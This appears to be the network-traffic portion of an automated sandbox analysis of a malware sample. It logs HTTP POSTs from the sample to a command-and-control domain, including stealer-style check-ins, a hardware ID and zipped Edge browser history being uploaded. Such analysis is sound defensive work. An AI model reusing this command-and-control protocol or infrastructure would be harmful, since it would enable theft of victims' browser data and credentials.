                  2024-07-25 20:14:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                  Data Ascii: act=life
                  2024-07-25 20:14:45 UTC812INHTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=m3tbpk3sd5o4odbpudbtfj0lj9; expires=Mon, 18-Nov-2024 14:01:24 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQFeogVpxQcLlz0dI7VVyifDJ1%2BDxVfa2qIiRncGCqxq6gI9DksVOC09bPnmW1K%2BMa4DGC9WOhMavtxcl4ZaewFq%2BMzEH5doe1k6A1SDF0J9N4uVXDFCj0jnR%2F2ZJnJF3Qm7PE9nbbtxZsE%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed16bfb528c29-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                  Data Ascii: 2ok
                  2024-07-25 20:14:45 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.949707104.21.48.2524436236C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  TimestampBytes transferredDirectionData
                  2024-07-25 20:14:46 UTC272OUTPOST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 49
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:46 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 6a 4b 73 42 32 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                  Data Ascii: act=recive_message&ver=4.0&lid=GjKsB2--&j=default
                  2024-07-25 20:14:47 UTC806INHTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=qenqabfa0res9ohq90ct4tv40o; expires=Mon, 18-Nov-2024 14:01:25 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drE451zfPLcRfdcH7gQDYTQkx5UzHrZmO3yEXd12qVV5%2F76290xrIAGsMUNQyi4WIuXQqXyuCFHkMh8ZYiySKN5mZCRaLmolkxPgAV606tGXUGTjzfW2iLV0xYFevD17jcfH6zg8Jx1Tjvw%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1755af341ac-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:47 UTC563INData Raw: 31 64 62 35 0d 0a 42 55 6d 34 6d 34 70 6a 73 4c 70 63 58 6c 57 2f 57 61 63 6d 48 74 64 4d 38 4f 4d 67 50 32 4a 38 66 67 4b 30 67 4c 4e 37 63 6e 5a 2b 61 38 36 35 73 46 65 63 6d 43 38 37 64 34 55 74 31 56 4e 37 2b 32 36 52 68 77 49 46 42 42 30 53 63 64 47 73 6b 51 30 66 56 44 38 76 32 66 66 35 42 70 79 59 4f 53 5a 33 68 51 4c 63 42 48 75 35 62 73 72 42 52 56 55 41 48 52 4a 67 31 65 76 63 43 78 34 56 62 53 58 66 38 2b 38 41 31 4e 73 77 4d 7a 44 61 50 4d 5a 4d 63 4c 34 68 6d 49 34 43 45 30 41 5a 42 43 43 4f 6f 76 34 65 42 68 64 49 4b 4d 76 77 71 42 36 63 77 58 34 37 4f 35 31 6a 68 55 64 37 74 53 43 57 68 30 74 58 43 68 51 61 59 64 44 71 77 78 49 55 48 6d 30 72 33 50 4c 6c 43 63 44 57 4f 6a 51 37 33 44 62 47 42 44 4c 31 4b 59 72 42 47 68 31 54 4c 42 39 78 78
                  Data Ascii: 1db5BUm4m4pjsLpcXlW/WacmHtdM8OMgP2J8fgK0gLN7cnZ+a865sFecmC87d4Ut1VN7+26RhwIFBB0ScdGskQ0fVD8v2ff5BpyYOSZ3hQLcBHu5bsrBRVUAHRJg1evcCx4VbSXf8+8A1NswMzDaPMZMcL4hmI4CE0AZBCCOov4eBhdIKMvwqB6cwX47O51jhUd7tSCWh0tXChQaYdDqwxIUHm0r3PLlCcDWOjQ73DbGBDL1KYrBGh1TLB9xx
                  2024-07-25 20:14:47 UTC1369INData Raw: 65 2f 36 35 67 2f 56 7a 6e 34 6a 65 63 52 37 77 6b 67 38 37 57 36 63 68 45 31 50 41 51 77 5a 62 73 54 75 31 42 38 64 46 32 6b 72 33 2f 37 6c 44 39 54 66 50 54 51 7a 33 44 58 4a 54 6e 2b 78 4c 64 4c 50 41 6c 6f 59 58 6b 51 67 35 2b 48 56 48 67 49 58 61 57 76 46 74 2f 46 42 31 64 52 2b 5a 48 66 58 50 63 68 4e 64 37 49 6d 6e 70 4e 4a 55 67 4d 58 47 32 62 63 34 64 6b 54 46 68 70 6d 4c 4e 2f 2b 2b 67 2f 5a 31 54 30 32 4d 5a 31 31 68 55 4e 6b 39 58 62 53 72 30 46 4d 46 69 77 66 63 63 65 69 7a 6c 63 4a 56 47 41 6e 6d 71 47 6f 43 4e 72 58 4d 7a 45 39 30 7a 37 49 54 58 32 30 49 35 53 4b 51 31 55 49 47 68 74 67 30 75 2f 65 46 78 41 61 62 79 37 65 38 2b 46 42 6e 4a 67 35 4a 48 65 46 65 2f 56 4a 63 4c 34 69 30 4c 52 42 55 77 34 5a 43 69 44 4a 72 4d 68 5a 46 78 67 6e
                  Data Ascii: e/65g/Vzn4jecR7wkg87W6chE1PAQwZbsTu1B8dF2kr3/7lD9TfPTQz3DXJTn+xLdLPAloYXkQg5+HVHgIXaWvFt/FB1dR+ZHfXPchNd7ImnpNJUgMXG2bc4dkTFhpmLN/++g/Z1T02MZ11hUNk9XbSr0FMFiwfcceizlcJVGAnmqGoCNrXMzE90z7ITX20I5SKQ1UIGhtg0u/eFxAaby7e8+FBnJg5JHeFe/VJcL4i0LRBUw4ZCiDJrMhZFxgn
                  2024-07-25 20:14:47 UTC1369INData Raw: 4d 4c 33 39 77 35 50 58 65 54 65 38 4a 63 50 4f 31 75 70 4a 46 50 55 53 34 56 45 47 6d 57 2f 5a 38 41 55 42 4e 72 61 34 4b 35 37 41 33 61 30 6a 45 31 50 64 63 30 7a 45 52 30 76 43 65 52 67 55 35 62 41 52 49 51 62 64 50 68 31 42 51 56 46 47 73 73 33 66 69 6f 54 35 4c 66 4a 6e 78 76 6e 51 76 49 53 48 65 35 62 4b 65 43 54 46 4d 48 43 46 78 2f 6d 50 75 52 48 68 78 55 50 32 76 56 2b 4f 55 4c 32 64 59 79 50 54 66 5a 4f 4d 39 45 63 37 41 6f 6d 6f 68 43 54 77 63 52 48 57 48 64 36 64 77 58 46 52 56 69 4c 4a 71 33 71 41 62 4b 6d 47 5a 38 47 76 51 42 68 56 73 79 72 47 36 56 6a 51 49 46 51 42 6f 57 59 4e 76 6f 32 68 59 54 45 32 6b 72 31 2f 50 36 43 64 4c 59 4d 44 6f 32 30 54 37 45 53 48 2b 6e 49 70 53 4d 52 46 55 53 58 6c 49 67 30 66 71 52 51 56 41 30 62 43 66 5a 39
                  Data Ascii: ML39w5PXeTe8JcPO1upJFPUS4VEGmW/Z8AUBNra4K57A3a0jE1Pdc0zER0vCeRgU5bARIQbdPh1BQVFGss3fioT5LfJnxvnQvISHe5bKeCTFMHCFx/mPuRHhxUP2vV+OUL2dYyPTfZOM9Ec7AomohCTwcRHWHd6dwXFRViLJq3qAbKmGZ8GvQBhVsyrG6VjQIFQBoWYNvo2hYTE2kr1/P6CdLYMDo20T7ESH+nIpSMRFUSXlIg0fqRQVA0bCfZ9
                  2024-07-25 20:14:47 UTC1369INData Raw: 52 4e 6a 6f 34 31 43 6e 47 53 48 4b 79 49 4a 36 50 54 31 63 44 45 31 77 75 6c 75 58 4a 57 55 68 55 53 79 7a 58 31 2b 4d 4e 31 5a 67 68 63 69 36 64 50 4d 6b 45 4a 50 55 69 6d 49 31 4c 58 51 6b 62 46 47 76 66 35 39 41 53 46 52 64 68 4a 74 58 77 2b 67 76 52 31 6a 30 77 4f 39 73 36 78 6c 5a 30 76 47 37 63 77 55 56 46 51 45 5a 63 51 64 6a 76 78 52 34 41 56 48 68 6c 77 37 6e 76 44 5a 4b 41 66 6a 38 32 30 6a 6a 45 53 58 71 38 4a 70 4b 48 52 31 49 4e 45 42 74 6e 31 75 2f 66 46 68 59 63 61 69 66 52 39 2b 45 48 30 74 6b 30 66 48 6d 64 50 4e 30 45 4a 50 55 65 6b 59 46 43 52 6b 41 42 55 6e 6d 57 35 64 31 5a 53 46 52 31 49 64 50 35 36 77 37 56 33 44 55 77 4d 74 67 30 78 6b 31 35 76 43 43 41 69 45 78 56 43 42 45 5a 61 39 62 76 32 78 55 51 46 79 64 6c 6d 76 37 77 51 59
                  Data Ascii: RNjo41CnGSHKyIJ6PT1cDE1wuluXJWUhUSyzX1+MN1Zghci6dPMkEJPUimI1LXQkbFGvf59ASFRdhJtXw+gvR1j0wO9s6xlZ0vG7cwUVFQEZcQdjvxR4AVHhlw7nvDZKAfj820jjESXq8JpKHR1INEBtn1u/fFhYcaifR9+EH0tk0fHmdPN0EJPUekYFCRkABUnmW5d1ZSFR1IdP56w7V3DUwMtg0xk15vCCAiExVCBEZa9bv2xUQFydlmv7wQY
                  2024-07-25 20:14:47 UTC1369INData Raw: 4f 64 73 70 77 30 74 31 74 69 32 62 68 6b 70 52 43 68 30 62 49 4a 69 69 31 67 46 51 54 43 63 49 7a 65 6e 6c 51 63 32 57 4a 33 77 77 30 58 75 64 42 48 53 34 4a 70 69 46 52 56 41 48 47 42 56 79 33 2b 66 66 47 52 51 66 61 43 33 65 2b 75 67 54 31 4e 77 32 50 7a 72 51 4e 63 5a 41 50 50 74 75 6c 5a 6b 43 42 55 41 73 45 57 37 4e 37 64 59 49 47 6c 52 34 5a 63 4f 35 37 77 32 53 67 48 34 34 4f 63 38 77 78 45 39 33 75 79 6d 64 68 45 68 64 44 78 6f 66 62 74 33 6a 30 68 45 64 47 57 6b 68 30 2f 44 76 44 64 62 66 66 6e 4a 33 32 69 4f 46 48 44 79 65 44 37 2b 74 52 55 64 41 41 56 4a 35 6c 75 58 64 57 55 68 55 61 79 4c 57 38 2b 4d 47 32 4e 59 33 4d 6a 7a 50 4b 63 5a 41 66 37 77 74 6c 59 68 4d 58 51 63 62 45 6d 66 58 36 64 55 54 45 78 49 6e 5a 5a 72 2b 38 45 47 4b 6d 42 49
                  Data Ascii: Odspw0t1ti2bhkpRCh0bIJii1gFQTCcIzenlQc2WJ3ww0XudBHS4JpiFRVAHGBVy3+ffGRQfaC3e+ugT1Nw2PzrQNcZAPPtulZkCBUAsEW7N7dYIGlR4ZcO57w2SgH44Oc8wxE93uymdhEhdDxofbt3j0hEdGWkh0/DvDdbffnJ32iOFHDyeD7+tRUdAAVJ5luXdWUhUayLW8+MG2NY3MjzPKcZAf7wtlYhMXQcbEmfX6dUTExInZZr+8EGKmBI
                  2024-07-25 20:14:47 UTC1369INData Raw: 4d 35 42 64 72 51 70 6d 6f 78 51 58 67 38 52 47 47 44 5a 35 4e 63 59 48 78 4a 67 49 74 76 78 37 30 47 63 6d 44 6b 6b 64 34 56 37 36 30 4e 2f 73 57 36 4e 7a 31 73 64 42 78 4a 63 4f 4a 62 69 32 78 4d 61 47 6d 63 73 79 50 2f 68 41 64 48 4b 50 54 6f 2f 32 7a 66 4a 53 58 53 38 4c 70 65 4b 54 31 59 4e 47 42 78 72 31 36 4b 66 57 52 63 4d 4a 33 4f 61 79 4f 55 50 31 74 59 39 4c 44 43 64 4a 49 74 64 50 4c 49 69 30 74 6b 43 55 67 6b 4d 47 32 58 65 36 39 45 58 47 52 31 67 4c 39 6e 34 37 41 33 64 30 54 30 30 4e 74 55 30 78 6b 52 33 76 53 53 54 6a 30 63 64 54 6c 34 62 65 4a 61 36 6b 54 59 54 45 57 77 71 6d 4e 37 75 42 74 36 59 49 58 49 75 6e 54 7a 4a 42 43 54 31 4c 5a 61 50 53 31 49 45 46 42 74 67 30 65 54 52 45 52 73 5a 62 44 6e 66 39 2b 30 41 30 74 6b 78 4d 44 66 50
                  Data Ascii: M5BdrQpmoxQXg8RGGDZ5NcYHxJgItvx70GcmDkkd4V760N/sW6Nz1sdBxJcOJbi2xMaGmcsyP/hAdHKPTo/2zfJSXS8LpeKT1YNGBxr16KfWRcMJ3OayOUP1tY9LDCdJItdPLIi0tkCUgkMG2Xe69EXGR1gL9n47A3d0T00NtU0xkR3vSSTj0cdTl4beJa6kTYTEWwqmN7uBt6YIXIunTzJBCT1LZaPS1IEFBtg0eTRERsZbDnf9+0A0tkxMDfP
                  2024-07-25 20:14:47 UTC205INData Raw: 2f 79 45 4b 79 76 52 56 73 46 47 51 77 69 2b 4f 6e 46 48 6c 42 61 4a 79 53 61 6f 64 46 42 6d 70 67 42 63 6e 66 46 65 35 30 45 53 62 59 67 6e 49 5a 55 54 45 30 77 47 32 62 54 35 63 46 62 50 68 39 7a 4c 4a 71 33 71 41 65 53 67 47 35 79 64 39 6b 71 68 52 77 73 35 33 58 48 30 68 55 4e 55 67 46 53 65 5a 62 30 6b 55 46 43 57 69 63 35 6d 71 47 6f 52 74 48 4b 4c 44 6f 30 79 7a 69 43 65 6b 4b 32 4f 4a 2b 4f 53 56 77 2b 49 44 4a 74 31 2b 48 66 57 79 45 43 61 6a 76 5a 2f 4f 38 2f 37 4e 59 35 4b 44 44 54 50 63 55 45 4d 76 55 68 30 74 6c 37 48 55 68 65 49 79 36 57 2b 70 46 42 55 43 46 6b 4a 64 54 2b 2f 68 43 66 2b 0d 0a
                  Data Ascii: /yEKyvRVsFGQwi+OnFHlBaJySaodFBmpgBcnfFe50ESbYgnIZUTE0wG2bT5cFbPh9zLJq3qAeSgG5yd9kqhRws53XH0hUNUgFSeZb0kUFCWic5mqGoRtHKLDo0yziCekK2OJ+OSVw+IDJt1+HfWyECajvZ/O8/7NY5KDDTPcUEMvUh0tl7HUheIy6W+pFBUCFkJdT+/hCf+
                  2024-07-25 20:14:47 UTC1369INData Raw: 32 34 36 62 0d 0a 79 67 78 4f 4e 59 36 68 51 6f 38 73 32 37 4b 30 51 77 64 42 41 39 63 4f 49 61 77 69 6b 78 44 51 7a 64 35 78 62 66 78 51 63 53 59 5a 6d 35 35 6e 53 6d 46 48 44 7a 79 49 4a 2b 41 51 56 4d 44 44 41 35 6d 31 66 54 53 58 69 34 71 52 69 62 52 39 65 55 4f 32 65 59 41 48 54 72 57 4e 38 68 4c 64 34 73 51 68 34 4a 4d 55 77 63 49 44 53 43 59 6f 74 35 5a 53 43 30 6e 59 35 72 47 70 6b 48 4b 6d 47 5a 38 41 74 34 31 79 30 4e 71 70 47 4f 7a 6a 45 6c 52 44 52 45 58 49 4a 69 69 31 31 6c 49 52 43 6c 72 33 75 69 6f 57 59 4b 4b 5a 57 6c 6b 69 6d 75 58 57 7a 4b 73 62 6f 54 42 47 67 39 4f 58 67 34 67 6a 71 4b 57 47 67 49 47 59 53 6a 4d 2b 71 38 2f 37 50 73 70 4b 6a 33 47 65 65 4e 44 62 62 77 34 6e 35 4e 38 59 79 34 54 48 57 50 59 6f 4f 41 50 48 51 52 6b 4c 74
                  Data Ascii: 246bygxONY6hQo8s27K0QwdBA9cOIawikxDQzd5xbfxQcSYZm55nSmFHDzyIJ+AQVMDDA5m1fTSXi4qRibR9eUO2eYAHTrWN8hLd4sQh4JMUwcIDSCYot5ZSC0nY5rGpkHKmGZ8At41y0NqpGOzjElRDREXIJii11lIRClr3uioWYKKZWlkimuXWzKsboTBGg9OXg4gjqKWGgIGYSjM+q8/7PspKj3GeeNDbbw4n5N8Yy4THWPYoOAPHQRkLt
                  2024-07-25 20:14:47 UTC1369INData Raw: 68 59 68 73 49 33 6e 45 65 39 4d 45 4a 4f 64 67 30 70 4d 43 42 55 42 5a 48 33 4c 45 35 4e 49 50 45 31 4e 5a 46 66 7a 36 2b 51 76 7a 31 53 34 37 43 65 4d 75 78 6b 70 79 73 6a 69 44 77 51 77 64 44 31 35 45 57 5a 61 71 6e 52 38 54 41 69 63 55 6c 4c 6e 77 51 59 71 59 43 7a 38 35 30 7a 7a 54 56 54 47 54 4c 59 4f 4c 59 31 41 51 47 56 77 75 6c 75 53 52 51 55 4e 61 4a 79 2f 4c 75 62 42 52 67 49 4e 72 62 32 43 4e 61 64 6f 4b 5a 66 55 34 30 74 6b 51 45 30 41 4d 58 44 69 57 70 64 49 4c 41 68 4a 6b 50 64 6d 2b 31 6a 2f 6e 32 7a 41 79 4d 4d 73 4f 78 6c 56 2f 74 53 57 73 76 32 4e 54 43 78 6b 51 64 75 6a 63 35 42 6f 65 47 6d 41 39 79 37 6d 6d 51 64 32 59 5a 67 56 33 6c 58 76 36 43 6a 79 74 62 73 72 42 64 31 34 4f 45 42 74 32 78 36 2f 6b 47 67 45 58 5a 79 43 61 74 36 67
                  Data Ascii: hYhsI3nEe9MEJOdg0pMCBUBZH3LE5NIPE1NZFfz6+Qvz1S47CeMuxkpysjiDwQwdD15EWZaqnR8TAicUlLnwQYqYCz850zzTVTGTLYOLY1AQGVwuluSRQUNaJy/LubBRgINrb2CNadoKZfU40tkQE0AMXDiWpdILAhJkPdm+1j/n2zAyMMsOxlV/tSWsv2NTCxkQdujc5BoeGmA9y7mmQd2YZgV3lXv6CjytbsrBd14OEBt2x6/kGgEXZyCat6g


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.949708104.21.48.2524436236C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  TimestampBytes transferredDirectionData
                  2024-07-25 20:14:47 UTC290OUTPOST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 13684
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:47 UTC13684OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:48 UTC812INHTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=a9q97c0vp5ikhl6f9bodes0609; expires=Mon, 18-Nov-2024 14:01:26 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrO683YTusgDhQBR3Vp7fKpb3b%2BYQjbsgNBrr0s%2FD4mGmEn78cJgW1Nobf%2FSpujom2Rw96ETBR85tjnts2sxfxDsRkN9saUt4rzJmlnnxyKMoxaSmTkp%2Fm2I0oWidpxZPNVZV3iXUV33oZk%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed17c795d41a1-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:48 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:48 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.949709104.21.48.2524436236C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  TimestampBytes transferredDirectionData
                  2024-07-25 20:14:48 UTC290OUTPOST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 16199
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:48 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
                  2024-07-25 20:14:48 UTC868OUTData Raw: 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 8d f5 3d f7 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 e5 a5 64 a8 3b 07 00 00 00 c8 00 00 17 00 00 00
                  Data Ascii: omparatorPKP{.)PKMQEdge/BrowserVersion.txtPK=% WEdge/dp.txtPKA`Edge/Default/HistoryPKd;
                  2024-07-25 20:14:49 UTC812INHTTP/1.1 200 OK
                  Date: Thu, 25 Jul 2024 20:14:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Set-Cookie: PHPSESSID=camj4jvmqgrvmjol6ontvctuoc; expires=Mon, 18-Nov-2024 14:01:28 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b6Ag8XSvl9ibeyC1PdZKBIG0QWVyzzXogK8bza%2Fr21AwKZzrDf09mSS6uvfEtcQtTP6c3GA27jM3Ft5UqIXaEGdSvVe21BXWyMpwotvVZjwouWBB5rj9UJ%2FWsr%2B5XjBzoMMN9LLcdsC%2BNrQ%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a8ed1842cf28c5f-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-25 20:14:49 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                  Data Ascii: eok 8.46.123.33
                  2024-07-25 20:14:49 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.949710104.21.48.2524436236C:\Users\user\Desktop\LisectAVT_2403002A_236.exe
                  TimestampBytes transferredDirectionData
                  2024-07-25 20:14:50 UTC290OUTPOST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 20574
                  Host: unhappytidydryypwto.shop
                  2024-07-25 20:14:50 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 31 46 31 44 36 46 37 32 41 35 41 30 46 45 31 42 41 36 33 45 38 39 44 46 31 36 37 44 30 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 47 6a 4b 73 42 32 2d 2d 0d 0a 2d 2d 62
                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"031F1D6F72A5A0FE1BA63E89DF167D00--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"GjKsB2----b
